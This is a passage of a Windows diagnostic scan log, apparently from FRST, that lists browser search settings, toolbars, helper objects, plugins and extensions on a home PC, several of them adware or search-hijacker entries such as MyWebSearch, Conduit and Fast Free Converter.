HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
URLSearchHook: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 - (No Name) - {8bdea9d6-6f62-45eb-8ee9-8a81af0d2f94} - No File
SearchScopes: HKLM -> DefaultScope {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM-x32 -> DefaultScope {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL =
SearchScopes: HKLM-x32 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM-x32 -> {9D2BF1CD-96EB-4EA4-9D12-EEAA66D4FC8D} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {23758B0B-0D9F-32A3-A476-D9B1033E7A1E} URL = hxxp://www.bing.com/search?q={searchTerms}&pc=ZUGO&form=ZGAIDF
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2EDC592E-BE3B-45E6-9A09-3818FD7629D6} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=&apn_dtid=OSJ000&apn_uid=6B700B84-D3AD-42B9-8117-AA8044508D55&apn_sauid=7FF7FD87-FFF2-42ED-8F75-9A7D9889C78F
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {57A65587-8AEC-4FF9-A3A3-32330322F26B} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA_enUS393US394
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL =
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?q={SEARCHTERMS}&o=15527&l=dis&prt=360&chn=retail&geo=US&ver=4
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3298582&CUI=UN25864562382803126&UM=2
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2013-07-29] (Oracle Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-07-29] (Oracle Corporation)
BHO-x32: Secure Online Account Numbers Helper -> {435EAA86-D32B-484F-869C-53745FCB1642} -> C:\Program Files (x86)\Discover\SOAN\DiscoverSOANHelper.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
BHO-x32: MixiDJ V46 Toolbar -> {62cad681-699f-4f83-b87f-95584003592f} -> C:\Program Files (x86)\MixiDJ_V46\prxtbMixi.dll [2013-05-16] ()
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Fast Free Converter 4.1 -> {8232785C-5C98-4A6E-B7B4-911FFBED7582} -> C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\FastFreeConverter.dll [2013-11-21] (Fast Free Converter)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-12-01] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: No Name -> {9D425283-D487-4337-BAB6-AB8354A81457} -> No File
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-02] (Google Inc.)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Google Gears Helper -> {E0FEFE40-FBF9-42AE-BA58-794CA7E3FB53} -> C:\Program Files (x86)\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll [2010-02-23] (Google Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll [2010-03-19] (<TOSHIBA>)
BHO-x32: Fast Free Converter 4.1 -> {F5580E24-8416-4DFD-90B3-078D4EDF4FCB} -> C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\FastFreeConverter.dll [2013-11-21] (Fast Free Converter)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
Toolbar: HKLM-x32 - Secure Online Account Numbers - {A8C7C2CA-6DFD-4E16-8458-592361564D38} - C:\Program Files (x86)\Discover\SOAN\DiscoverSOANToolbar.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
Toolbar: HKLM-x32 - No Name - {9D425283-D487-4337-BAB6-AB8354A81457} -  No File
Toolbar: HKLM-x32 - MixiDJ V46 Toolbar - {62cad681-699f-4f83-b87f-95584003592f} - C:\Program Files (x86)\MixiDJ_V46\prxtbMixi.dll [2013-05-16] ()
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {9D425283-D487-4337-BAB6-AB8354A81457} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {62CAD681-699F-4F83-B87F-95584003592F} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {A13C2648-91D4-4BF3-BC6D-0079707C4389} -  No File
DPF: HKLM-x32 {2FF8D282-F78A-4A33-ABC2-49E72A341482} hxxp://riteaid.storefront.com/images/global/activex/SFImageUpload1_10.CAB
DPF: HKLM-x32 {C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F} hxxp://www.ritzpix.com/net/Uploader/LPUploader57.cab
Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System\BAVoilaX.dll [2013-03-29] (Belarc, Inc.)
Handler-x32: cozi - {5356518D-FE9C-4E08-9C1F-1E872ECD367F} - C:\Program Files (x86)\Cozi Express\CoziProtocolHandler.dll [2010-12-29] (Cozi Group, Inc.)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Search Provided by Yahoo
FF Homepage: hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\windows\system32\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2011-07-29] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-01-11] (Foxit Corporation)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-05-04] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-09-23] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2574262253-2623044021-4024016403-1001: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll [2012-08-28] (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol500.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2012-10-19] (Coupons, Inc.)
FF Extension: Evernote Web Clipper - C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049\Extensions\{E0B8C461-F8FB-49b4-8373-FE32E9252800}.xpi [2015-12-08]
FF Extension: Skype extension - C:\Program Files (x86)\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1} [2016-01-12] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{000a9d1c-beef-4f90-9363-039d445309b8}] - C:\Program Files (x86)\Google\Google Gears\Firefox
FF Extension: Google Gears - C:\Program Files (x86)\Google\Google Gears\Firefox [2010-08-20] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [discoversoan@orbiscom] - C:\Program Files (x86)\Discover\SOAN
FF Extension: Secure Online Account Numbers - C:\Program Files (x86)\Discover\SOAN [2010-11-20] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [extension@Fast_Free_Converter.com] - C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com
FF Extension: No Name - C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com [2016-03-08] [not signed]
FF HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Firefox\Extensions: [{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}] - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}
FF Extension: XULRunner - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} [2010-09-19] [not signed]

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\PepperFlash\pepflashplayer.dll => No File
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\pdf.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol400.dll (Catalina Marketing Corporation)
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol500.dll (Catalina Marketing Corporation)
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll => No File
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll => No File
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll => No File
CHR Plugin: (DivX Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll => No File
CHR Plugin: (Foxit Reader Plugin for Mozilla) - C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll => No File
CHR Plugin: (Java Platform SE 7 U7) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (McAfee Security Scanner +) - C:\Program Files (x86)\McAfee Security Scan\3.0.318\npMcAfeeMss.dll => No File
CHR Plugin: (My Web Search Plugin Stub) - C:\Program Files (x86)\MyWebSearch\bar\1.bin\NPMyWebS.dll => No File
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_6_602_180.dll => No File
CHR Plugin: (Java Deployment Toolkit 7.0.70.11) - C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
CHR Profile: C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (The Best Price (extension)) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\gehjddhojclknjlgakpfmhlhkbpeakjf [2013-07-04]
CHR Extension: (Any.do Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2016-03-08]
CHR Extension: (Evernote Web) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbfehkoinhhcknnbdgnnmjhiladcgbol [2014-03-18]
CHR Extension: (Google Maps) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-09-28]
CHR Extension: (Springpad Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\njhgeimnepehieioinbhmfpphfoocmng [2013-07-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-01]
CHR Extension: (My Chrome Theme) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic [2015-08-27]
CHR Extension: (Evernote Web Clipper) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2016-03-08]
CHR HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ccifdkgnonhkcmaoappjpmijdhlppgmg] - C:\Users\Lexi\AppData\Local\CRE\ccifdkgnonhkcmaoappjpmijdhlppgmg.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [ccifdkgnonhkcmaoappjpmijdhlppgmg] - C:\Users\Lexi\AppData\Local\CRE\ccifdkgnonhkcmaoappjpmijdhlppgmg.crx <not found>

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 ADVService; C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe [25704 2011-11-24] (Amazon.com) [File not signed]
